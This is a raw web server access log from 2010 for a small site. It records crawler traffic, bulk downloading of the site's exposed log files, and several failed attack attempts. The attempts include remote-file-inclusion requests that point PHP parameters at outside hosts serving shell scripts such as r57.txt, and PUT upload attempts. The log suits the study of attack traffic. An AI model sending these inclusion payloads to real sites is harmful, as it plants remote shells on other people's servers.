201.219.3.103 - - [06/Sep/2010:05:12:08 -0700] "GET /logs//errors.php?error=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
201.219.3.103 - - [06/Sep/2010:05:12:08 -0700] "GET /errors.php?error=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/msh.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "virtualsupplynet.com"
208.80.194.33 - - [06/Sep/2010:08:29:54 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.0.0; IEMB3; IEMB3)" "virtualsupplynet.com"
67.195.110.174 - - [06/Sep/2010:09:05:01 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
189.123.162.29 - - [06/Sep/2010:09:55:44 -0700] "GET /logs/access_100710.loghttp://nerciocosmeticos.comercial.ws/chove.txt?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "virtualsupplynet.com"
189.123.162.29 - - [06/Sep/2010:10:18:18 -0700] "GET /logs/access_100710.loghttp:/nerciocosmeticos.comercial.ws/chove.txt?? HTTP/1.1" 404 - "-" "-" "virtualsupplynet.com"
207.46.13.51 - - [06/Sep/2010:11:42:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
207.46.13.51 - - [06/Sep/2010:12:13:52 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
213.180.209.11 - - [06/Sep/2010:12:29:43 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
213.180.209.11 - - [06/Sep/2010:15:03:59 -0700] "GET /logs/access_100508.log HTTP/1.1" 200 116956 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
88.250.57.232 - - [06/Sep/2010:16:33:48 -0700] "GET /logs/access_100905.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
213.180.209.11 - - [06/Sep/2010:18:00:06 -0700] "GET /logs/access_100731.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
200.34.175.15 - - [06/Sep/2010:18:27:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "virtualsupplynet.com"
200.34.175.15 - - [06/Sep/2010:18:27:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "virtualsupplynet.com"
184.72.194.33 - - [06/Sep/2010:18:43:31 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "www.virtualsupplynet.com"
213.180.209.11 - - [06/Sep/2010:21:04:49 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 73111 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
110.139.48.12 - - [06/Sep/2010:21:35:12 -0700] "PUT /anjing.txt HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CF5E3CC5-C200-4C5F-946E-7EFFEDB5521E})" "virtualsupplynet.com"
110.139.48.12 - - [06/Sep/2010:21:40:31 -0700] "PUT /anjing.txt HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={CF5E3CC5-C200-4C5F-946E-7EFFEDB5521E})" "www.virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:00:12:23 -0700] "GET /logs/access_100828.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.115.249 - - [07/Sep/2010:04:00:44 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [07/Sep/2010:04:02:10 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:04:57:05 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 70879 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
207.46.12.236 - - [07/Sep/2010:04:59:36 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
208.80.194.51 - - [07/Sep/2010:05:23:21 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)" "www.virtualsupplynet.com"
207.46.12.236 - - [07/Sep/2010:05:28:35 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "virtualsupplynet.com"
66.249.65.206 - - [07/Sep/2010:07:22:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:32 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [07/Sep/2010:11:00:34 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:11:30:01 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [07/Sep/2010:11:50:13 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [07/Sep/2010:11:50:29 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.249 - - [07/Sep/2010:14:55:32 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [07/Sep/2010:14:56:15 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:16:24:13 -0700] "GET /logs/access_100522.log HTTP/1.0" 200 103608 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
88.250.57.232 - - [07/Sep/2010:16:34:03 -0700] "GET /logs/access_100906.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
174.127.132.148 - - [07/Sep/2010:18:29:52 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.148 - - [07/Sep/2010:18:33:44 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.147 - - [07/Sep/2010:18:34:58 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.146 - - [07/Sep/2010:18:36:31 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.149 - - [07/Sep/2010:18:36:35 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.149 - - [07/Sep/2010:18:36:48 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.147 - - [07/Sep/2010:18:38:10 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.146 - - [07/Sep/2010:18:38:51 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
208.80.194.36 - - [07/Sep/2010:18:45:16 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={FF5BBDF6-13F9-4F49-816E-58F618C18B47})" "virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:18:56:36 -0700] "GET /logs/access_100731.log HTTP/1.0" 200 213363 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:18:59:46 -0700] "GET /logs/access_100508.log HTTP/1.0" 200 116956 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.146 - - [07/Sep/2010:19:04:40 -0700] "GET /logs/access_100821.log HTTP/1.0" 200 95305 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:19:12:31 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 114275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:19:12:32 -0700] "GET /logs/access_100605.log HTTP/1.0" 200 125664 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:19:12:57 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1498 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.150 - - [07/Sep/2010:19:13:16 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
174.127.132.146 - - [07/Sep/2010:19:16:52 -0700] "GET /logs/access_100522.log HTTP/1.0" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:21:59:12 -0700] "GET /logs/access_100814.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
91.214.44.45 - - [07/Sep/2010:23:01:51 -0700] "GET /logs/access_100703.log HTTP/1.1" 200 96073 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "virtualsupplynet.com"
213.180.209.11 - - [07/Sep/2010:23:26:53 -0700] "GET /logs/access_100529.log HTTP/1.1" 200 87564 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
85.195.105.14 - - [07/Sep/2010:23:28:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://byasker.org/dosyalar/r57.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4" "virtualsupplynet.com"
85.195.105.14 - - [07/Sep/2010:23:33:03 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://byasker.org/dosyalar/r57.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4" "virtualsupplynet.com"
85.195.105.14 - - [07/Sep/2010:23:55:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://byasker.org/dosyalar/r57.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4" "virtualsupplynet.com"
213.180.207.227 - - [08/Sep/2010:00:29:22 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
213.180.207.227 - - [08/Sep/2010:00:29:23 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:16 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:17 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:17 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:18 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [08/Sep/2010:00:31:18 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
174.127.132.156 - - [08/Sep/2010:00:44:48 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:50:45 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.156 - - [08/Sep/2010:00:51:37 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:52:00 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:53:42 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:54:19 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:56:21 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.153 - - [08/Sep/2010:00:56:56 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.157 - - [08/Sep/2010:01:17:09 -0700] "GET /logs/?N=D HTTP/1.0" 200 3782 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.159 - - [08/Sep/2010:01:17:27 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.157 - - [08/Sep/2010:01:21:45 -0700] "GET /logs/access_100501.log HTTP/1.0" 200 73111 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.159 - - [08/Sep/2010:01:22:55 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 114275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.156 - - [08/Sep/2010:01:24:34 -0700] "GET /logs/access_100724.log HTTP/1.0" 200 216202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.156 - - [08/Sep/2010:01:27:42 -0700] "GET /logs/access.log HTTP/1.0" 200 40910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.157 - - [08/Sep/2010:01:27:58 -0700] "GET /?S=D HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.156 - - [08/Sep/2010:01:29:23 -0700] "GET /logs/access_100703.log HTTP/1.0" 200 96073 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
174.127.132.157 - - [08/Sep/2010:01:30:37 -0700] "GET /logs/access_100529.log HTTP/1.0" 200 87564 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "virtualsupplynet.com"
38.107.191.94 - - [08/Sep/2010:05:21:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "virtualsupplynet.com"